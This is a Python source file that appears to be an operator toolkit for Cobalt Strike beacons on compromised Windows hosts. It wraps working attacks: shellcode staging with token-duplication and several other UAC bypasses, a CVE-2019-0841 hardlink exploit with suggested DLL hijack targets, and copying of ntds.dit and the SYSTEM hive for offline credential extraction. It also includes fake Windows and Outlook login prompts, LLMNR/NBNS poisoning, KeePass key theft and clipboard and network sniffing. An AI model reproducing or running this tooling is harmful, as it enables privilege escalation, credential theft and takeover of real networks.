def elevate_token_shellcode_csharp(bid, shellcode):
    """
    Elevate with token duplication bypass. Execute `shellcode` with a C# helper.

    `shellcode` is a local file path. Three files are uploaded to the beacon's
    temp directory (as guessed by helpers.guess_temp): execute_assembly.exe as
    NugetPackage.exe, execute_shellcode.exe as Stage2.exe and `shellcode` as
    nuget.package. Only Stage2.exe is named on the Invoke-TokenDuplication
    command line; the other two are presumably located by Stage2 itself
    (TODO confirm against tools/execute_shellcode.exe). All three are removed
    with brm afterwards.
    """
    aggressor.bpowershell_import(
        bid, utils.basedir('modules/FilelessUACBypass.ps1'))

    execute_shellcode = utils.basedir('tools/execute_shellcode.exe')
    execute_assembly = utils.basedir('tools/execute_assembly.exe')

    # remote paths; all three land in the same guessed temp directory
    stage1 = r'{}\NugetPackage.exe'.format(helpers.guess_temp(bid))
    #stage2 = r'{}\nuget_update.package'.format(helpers.guess_temp(bid))
    stage2 = r'{}\Stage2.exe'.format(helpers.guess_temp(bid))
    package = r'{}\nuget.package'.format(helpers.guess_temp(bid))

    helpers.upload_to(bid, execute_assembly, stage1)
    helpers.upload_to(bid, execute_shellcode, stage2)
    helpers.upload_to(bid, shellcode, package)

    # only stage2 is passed; stage1/package are not referenced on the command line
    command = 'Invoke-TokenDuplication -Binary {}'.format(
        powershell_quote(stage2))
    aggressor.bpowerpick(bid, command)

    # cleanup of the uploaded files
    aggressor.brm(bid, stage1)
    aggressor.brm(bid, stage2)
    aggressor.brm(bid, package)
def run(bid, program, args=None, silent=False):
    """
    Run a registered `program` on beacon `bid`.

    Dispatches on which registry holds `program`: `assemblies` (run via
    bexecute_assembly), `powershell` (import the script, then pass `args`
    to bpowerpick) or `callbacks` (call the Python callable). Raises
    RuntimeError when `program` is in none of them.

    `silent` only suppresses the btask message in the assembly branch and is
    forwarded to callbacks; the powershell branch does not use it.
    """
    # no args
    if not args:
        args = []

    if program in assemblies:
        assembly = assemblies[program]
        # presumably quotes/escapes the argument list for the assembly — verify helpers.eaq
        args = helpers.eaq(args)
        if not silent:
            aggressor.btask(bid, 'Tasked beacon to run {} {}'.format(program, args))
        aggressor.bexecute_assembly(bid, assembly, args, silent=True)
    elif program in powershell:
        script = powershell[program]
        aggressor.bpowershell_import(bid, script)
        if isinstance(args, list) or isinstance(args, tuple):
            args = ' '.join(powershell_quote(args))
        # NOTE(review): at this point `args` is a str (either passed in as one
        # or joined just above), so ' '.join(args) inserts a space between
        # every character of it.
        aggressor.bpowerpick(bid, ' '.join(args))
    elif program in callbacks:
        callback = callbacks[program]
        callback(bid, args, silent=silent)
    else:
        raise RuntimeError('Unrecognized program: {}'.format(program))
def import_network_recon(bid):
    """Import NetworkRecon.ps1 into beacon `bid` via bpowershell_import."""
    script_path = utils.basedir('powershell/NetworkRecon.ps1')
    aggressor.bpowershell_import(bid, script_path)
def import_domain_recon(bid):
    """Import DomainRecon.ps1 into beacon `bid` via bpowershell_import."""
    script_path = utils.basedir('powershell/DomainRecon.ps1')
    aggressor.bpowershell_import(bid, script_path)
def _(bid, runtime=99999, *args):
    """
    Import Inveigh.ps1 and start Invoke-Inveigh with console output disabled
    (-ConsoleOutput N), LLMNR and NBNS enabled, and -RunTime `runtime`.

    Because `runtime` comes before `*args`, the first extra positional
    argument is taken as the runtime; anything after it is appended to the
    command line verbatim, without quoting.
    """
    aggressor.bpowershell_import(
        bid, utils.basedir('powershell/Inveigh/Inveigh.ps1'))
    aggressor.bpowerpick(
        bid,
        "Invoke-Inveigh -ConsoleOutput N -RunTime {} -Tool 2 -LLMNR Y -NBNS Y -StatusOutput Y {}"
        .format(runtime, ' '.join(args)))
def elevate_slui_command(bid, command):
    """
    Elevate with slui bypass.

    Imports FilelessUACBypass.ps1, then runs Invoke-SluiBypass with
    `command` passed through powershell_quote.
    """
    bypass_script = utils.basedir('modules/FilelessUACBypass.ps1')
    aggressor.bpowershell_import(bid, bypass_script)

    quoted = powershell_quote(command)
    aggressor.bpowerpick(bid, 'Invoke-SluiBypass -Command {}'.format(quoted))
def _(bid):
    """
    Import and run the two KeePass helpers in order: Find-KeePassconfig from
    KeePassconfig.ps1, then Get-KeePassDatabaseKey -Verbose from KeeThief.ps1.
    """
    steps = (
        # KeePassConfig
        ('powershell/KeePassconfig.ps1', "Find-KeePassconfig"),
        # KeeThief
        ('powershell/KeeThief.ps1', "Get-KeePassDatabaseKey -Verbose"),
    )
    for script, cmdlet in steps:
        aggressor.bpowershell_import(bid, utils.basedir(script))
        aggressor.bpowerpick(bid, cmdlet)
def elevate_eventvwr_command(bid, command):
    """
    Elevate with eventvwr bypass.

    Imports Invoke-EventVwrBypass.ps1, then runs Invoke-EventVwrBypass with
    `command` passed through powershell_quote.
    """
    bypass_script = utils.basedir('modules/Invoke-EventVwrBypass.ps1')
    aggressor.bpowershell_import(bid, bypass_script)

    quoted = powershell_quote(command)
    aggressor.bpowerpick(bid, 'Invoke-EventVwrBypass -Command {}'.format(quoted))
def elevate_wscript_command(bid, command):
    """
    Elevate with wscript bypass.

    Imports Invoke-WScriptBypassUAC.ps1, then runs Invoke-WScriptBypassUAC
    with `command` (quoted) as -payload.
    """
    bypass_script = utils.basedir('modules/Invoke-WScriptBypassUAC.ps1')
    aggressor.bpowershell_import(bid, bypass_script)

    quoted = powershell_quote(command)
    aggressor.bpowerpick(bid, 'Invoke-WScriptBypassUAC -payload {}'.format(quoted))
def _(bid, out=None):
    """
    Import UserSPN.ps1 and run Get-AccountSPNs.

    When `out` is truthy the output is redirected to that (quoted) file path
    with `>`; otherwise the cmdlet runs with no redirection.
    """
    aggressor.bpowershell_import(bid, utils.basedir('powershell/UserSPN.ps1'))

    # output to file
    redirect = ' > {}'.format(powershell_quote(out)) if out else ''
    aggressor.bpowerpick(bid, 'Get-AccountSPNs' + redirect)
def elevate_cve_2019_0841(bid, target, overwrite=None):
    r"""
    Elevate with CVE-2019-0841. Change permissions of 'target'. Optionally overwrite 'target' with 'overwrite'.

    Good overwrite options:
      - C:\Program Files\LAPS\CSE\AdmPwd.dll (then run gpupdate)
      - C:\Program Files (x86)\Google\Update\1.3.34.7\psmachine.dll (then wait for google update or run it manually)

    Side effects visible in the generated script: the MicrosoftEdge process is
    stopped (twice), the Edge settings.dat is deleted and replaced by a hard
    link to `target`, Edge is started once, and the resulting ACL of `target`
    is printed with Get-Acl. Only `target` goes through powershell_quote;
    `edge_dir` and `settings_dat` are fixed strings inserted unquoted.
    """
    native_hardlink_ps1 = utils.basedir('powershell/Native-HardLink.ps1')

    # glob over the per-user Edge package directory; resolved on the target
    edge_dir = r'$env:localappdata\Packages\Microsoft.MicrosoftEdge_*'
    settings_dat = r'\Settings\settings.dat'

    # `{{`/`}}` are literal braces for the PowerShell if-blocks after .format()
    command = helpers.code_string(r"""
    # Stop Edge
    echo "[.] Stopping Edge"
    $process = Get-Process -Name MicrosoftEdge 2>$null
    if ($process) {{
        $process | Stop-Process
    }}
    sleep 3

    # Hardlink
    $edge_dir = Resolve-Path {edge_dir}
    $settings_dat = $edge_dir.Path + '{settings_dat}'
    echo "[.] Making Hardlink from $settings_dat to {target}"
    rm $settings_dat
    Native-HardLink -Verbose -Link $settings_dat -Target {target}

    # Start Edge
    echo "[.] Starting Edge"
    Start Microsoft-Edge:
    sleep 3

    # Stop it again
    echo "[.] Stopping Edge"
    $process = Get-Process -Name MicrosoftEdge 2>$null
    if ($process) {{
        $process | Stop-Process
    }}

    echo "[+] All Finished!"
    echo "[.] New ACLs:"
    Get-Acl {target} | Format-List
    """.format(edge_dir=edge_dir, settings_dat=settings_dat, target=powershell_quote(target)))

    aggressor.bpowershell_import(bid, native_hardlink_ps1, silent=True)
    aggressor.bpowerpick(bid, command, silent=True)

    if overwrite:
        # upload the local file `overwrite` over the (now re-ACLed) `target`;
        # explorer_stomp is then applied to it — presumably adjusts its
        # timestamps, confirm against helpers
        helpers.upload_to(bid, overwrite, target)
        helpers.explorer_stomp(bid, target)
def _(bid, *ranges):
    """
    Import Invoke-ReverseDnsLookup.ps1 and run it once per entry in `ranges`.

    All invocations are newline-separated and sent in a single bpowerpick
    call; each range is inserted unquoted.
    """
    script_path = utils.basedir(
        'powershell/PowerSploit/Recon/Invoke-ReverseDnsLookup.ps1')
    aggressor.bpowershell_import(bid, script_path)

    lines = ['Invoke-ReverseDnsLookup {}\n'.format(r) for r in ranges]
    aggressor.bpowerpick(bid, ''.join(lines))
def _(bid, runtime=99999, *args):
    """
    Import Inveigh.ps1 and start Invoke-Inveigh with file output enabled,
    writing under $env:userprofile\\AppData\\Roaming\\Microsoft, LLMNR and
    NBNS enabled, and -RunTime `runtime`.

    As in the console variant, the first extra positional argument fills
    `runtime`; the rest are appended verbatim without quoting. The output
    location is also echoed to the operator via btask.
    """
    aggressor.bpowershell_import(
        bid, utils.basedir('powershell/Inveigh/Inveigh.ps1'))
    aggressor.btask(
        bid,
        'Tasked beacon to run inveigh with output files at %userprofile%\\AppData\\Roaming\\Microsoft'
    )
    aggressor.bpowerpick(
        bid,
        r"Invoke-Inveigh -FileOutput Y -FileOutputDirectory $env:userprofile\AppData\Roaming\Microsoft -RunTime {} -Tool 2 -LLMNR Y -NBNS Y -StatusOutput Y {}"
        .format(runtime, ' '.join(args)))
def _(bid, title='Windows Security', message='Please re-enter your user credentials.'):
    """
    Import Invoke-LoginPrompt.ps1 and call ShowPrompt with `title` and
    `message`, echoing the result (or a failure message) back.

    `title` and `message` are substituted into double-quoted PowerShell
    strings with str.format and no escaping, so a `"` or `$` in either
    changes the generated script.
    """
    aggressor.bpowershell_import(
        bid, utils.basedir('powershell/Invoke-LoginPrompt.ps1'))

    # NOTE(review): `command` is never assigned before this `+=`, so this
    # statement raises UnboundLocalError when the function is called.
    command += helpers.code_string(r"""
    $out = ShowPrompt "{}" "{}"
    if ($out) {{
        $out
    }} else {{
        echo "Didn't get the credentials"
    }}
    """.format(title, message))

    # powerpick doesn't work with $host.ui
    aggressor.bpowershell(bid, command, silent=True)
def _(bid):
    r"""
    Import Invoke-NinjaCopy.ps1 and copy ntds.dit and the SYSTEM hive from
    their fixed locations under C:\Windows to C:\Windows\temp, then log the
    destination paths with blog2.

    The copies are left on disk; nothing in this function removes them.
    """
    ntds_source = r'C:\Windows\ntds\ntds.dit'
    system_source = r'C:\Windows\system32\config\SYSTEM'
    ntds_dest = r'C:\Windows\temp\ntds.dit'
    system_dest = r'C:\Windows\temp\SYSTEM'

    aggressor.bpowershell_import(
        bid,
        utils.basedir(
            'powershell/PowerSploit/Exfiltration/Invoke-NinjaCopy.ps1'))

    # both copies are issued in one powerpick; paths are fixed constants, not
    # user input, so plain double quotes are used instead of powershell_quote
    command = helpers.code_string(r"""
    Invoke-NinjaCopy -Path "{}" -LocalDestination "{}"
    Invoke-NinjaCopy -Path "{}" -LocalDestination "{}"
    """.format(ntds_source, ntds_dest, system_source, system_dest))

    aggressor.bpowerpick(bid, command)
    aggressor.blog2(
        bid, 'Files will be at "{}" and "{}"'.format(ntds_dest, system_dest))
def elevate_token_command(bid, command, *other_args):
    """
    Elevate with token duplication bypass. Execute `command` with `arguments`.

    `command` is split on whitespace: the first token becomes -Binary and the
    remaining tokens, re-joined with single spaces, become -Arguments. A
    binary path that itself contains spaces is therefore split apart.
    `other_args` are appended to the Invoke-TokenDuplication line verbatim,
    without quoting.
    """
    command, *arguments = command.split()

    aggressor.bpowershell_import(
        bid, utils.basedir('modules/FilelessUACBypass.ps1'))

    powershell = 'Invoke-TokenDuplication -Binary {} '.format(
        powershell_quote(command))

    if arguments:
        # original whitespace between arguments is collapsed to one space
        powershell += '-Arguments {} '.format(
            powershell_quote(' '.join(arguments)))

    if other_args:
        powershell += ' '.join(other_args)

    aggressor.bpowerpick(bid, powershell)
def _(
        bid,
        title='Microsoft Outlook',
        message='Your Outlook session has expired. Please re-enter your credentials.'
):
    """
    Import Invoke-LoginPrompt.ps1, stop the OUTLOOK process, show a prompt
    with `title` and `message`, and start Outlook again only if ShowPrompt
    returned a result.

    Stop-Process -Name OUTLOOK runs unconditionally and is not suppressed, so
    it errors if Outlook is not running. `title` and `message` are inserted
    into double-quoted PowerShell strings via str.format with no escaping, so
    a `"` or `$` in either changes the generated script.
    """
    aggressor.bpowershell_import(
        bid, utils.basedir('powershell/Invoke-LoginPrompt.ps1'))

    command = helpers.code_string(r"""
    Stop-Process -Name OUTLOOK
    $out = ShowPrompt "{}" "{}"
    if ($out) {{
        $out
        Start-Process outlook
    }} else {{
        echo "Didn't get the credentials"
    }}
    """.format(title, message))

    # powerpick doesn't work with $host.ui
    aggressor.bpowershell(bid, command, silent=True)
def _(bid):
    """Import Inveigh.ps1 and run Stop-Inveigh to end a running Inveigh session."""
    inveigh_script = utils.basedir('powershell/Inveigh/Inveigh.ps1')
    aggressor.bpowershell_import(bid, inveigh_script)
    aggressor.bpowerpick(bid, 'Stop-Inveigh')
def _(bid):
    """Import Invoke-mimikittenz.ps1 and run Invoke-mimikittenz with no arguments."""
    script_path = utils.basedir("powershell/Invoke-mimikittenz.ps1")
    aggressor.bpowershell_import(bid, script_path)
    aggressor.bpowerpick(bid, "Invoke-mimikittenz")
def _(bid, *args):
    """
    Import Start-ClipboardMonitor.ps1 and run Start-ClipboardMonitor with
    `args`, each quoted via powershell_quote and joined by spaces.
    """
    script_path = utils.basedir('powershell/Start-ClipboardMonitor.ps1')
    aggressor.bpowershell_import(bid, script_path)

    quoted_args = ' '.join(powershell_quote(args))
    aggressor.bpowerpick(bid, 'Start-ClipboardMonitor {}'.format(quoted_args))
def import_host_recon(bid):
    """Import HostRecon.ps1 into beacon `bid` via bpowershell_import."""
    script_path = utils.basedir('powershell/HostRecon.ps1')
    aggressor.bpowershell_import(bid, script_path)
def import_script(bid, program):
    """
    Import the PowerShell script registered under `program` in `powershell`.

    Raises RuntimeError if `program` is not a known script.
    """
    if program not in powershell:
        raise RuntimeError('Not a known script: {}'.format(program))
    aggressor.bpowershell_import(bid, powershell[program])
def _(bid):
    """Import Invoke-CredLeak.ps1 and run Invoke-CredLeak with no arguments."""
    script_path = utils.basedir('powershell/Invoke-CredLeak.ps1')
    aggressor.bpowershell_import(bid, script_path)
    aggressor.bpowerpick(bid, 'Invoke-CredLeak')
def _(bid, *args):
    """
    Import SessionGopher.ps1 and run Invoke-SessionGopher with `args`, each
    quoted via powershell_quote and joined by spaces.
    """
    script_path = utils.basedir('powershell/SessionGopher.ps1')
    aggressor.bpowershell_import(bid, script_path)

    quoted_args = ' '.join(powershell_quote(args))
    aggressor.bpowerpick(bid, 'Invoke-SessionGopher ' + quoted_args)
def import_av_logs(bid):
    """Import AVLogs.ps1 into beacon `bid` via bpowershell_import."""
    script_path = utils.basedir('powershell/AVLogs.ps1')
    aggressor.bpowershell_import(bid, script_path)
def _(bid, *args):
    r"""
    Import Invoke-NetRipper.ps1 and run Invoke-NetRipper with a fixed
    -LogLocation of C:\Temp\ followed by `args`, each quoted via
    powershell_quote and joined by spaces.
    """
    script_path = utils.basedir('powershell/Invoke-NetRipper.ps1')
    aggressor.bpowershell_import(bid, script_path)

    quoted_args = ' '.join(powershell_quote(args))
    aggressor.bpowerpick(
        bid, r'Invoke-NetRipper -LogLocation C:\Temp\ ' + quoted_args)